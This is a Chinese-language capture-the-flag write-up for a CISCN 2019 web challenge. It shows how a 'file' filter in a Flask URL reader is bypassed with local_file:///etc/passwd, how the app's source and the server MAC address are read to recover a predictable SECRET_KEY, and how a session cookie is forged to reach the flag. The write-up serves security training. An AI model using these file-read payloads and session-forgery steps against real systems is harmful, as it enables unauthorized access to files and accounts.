ciscn2019华东南赛区web4题解

2020-04-08 17:47:37 浏览数 (1)

进入题目页面会提示read something,点击会进入如下链接的页面:

代码语言:javascript复制
http://4970349e-b8c1-49e8-9594-666375a56ca2.node3.buuoj.cn/read?url=https://baidu.com

页面显示no response。

尝试利用url读取文件,使用file:///etc/passwd。

提示no hack。

看着url不像是PHP,因为我好像极少见过PHP用这种路由,直接冒一波险猜他是flask。使用local_file:///etc/passwd读取。

冒险成功。

接下来读app/app.py把源码拿下来。

代码语言:javascript复制
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

在源码中可以看到有一个flag路由,如果session的username为fuck可以直接得到flag。所以接下来的关键就是看看能不能伪造session。

伪造session需要密钥,正好源码中涉及了。

代码语言:javascript复制
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)

对于伪随机数,如果seed是固定的,生成的随机数是可以预测的,也就是顺序固定的,所以只要知道seed的值即可。这里的seed使用的uuid.getnode()的值,该函数用于获取Mac地址并将其转换为整数。所以我们还需要读一下Mac地址。

使用的payload为local_file:///sys/class/net/eth0/address

得到Mac地址为:02:42:ae:01:d9:0e。

接下来使用python2求解,因为python3和python2的str保留的位数不一样。

代码语言:javascript复制
import random
random.seed(0x0242ae01d90e)
print(str(random.random()*233))

得到115.152461339。

接下来使用github的flask-session-manager进行加解密。

首先解密session得到{u'username': 'www-data'},将www-data换成fuck并加密得到:

eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.XonT0Q.wFSm3JOFRrHW-whBsQRIwAn64_0。

访问/flag并修改session得到flag。

0 人点赞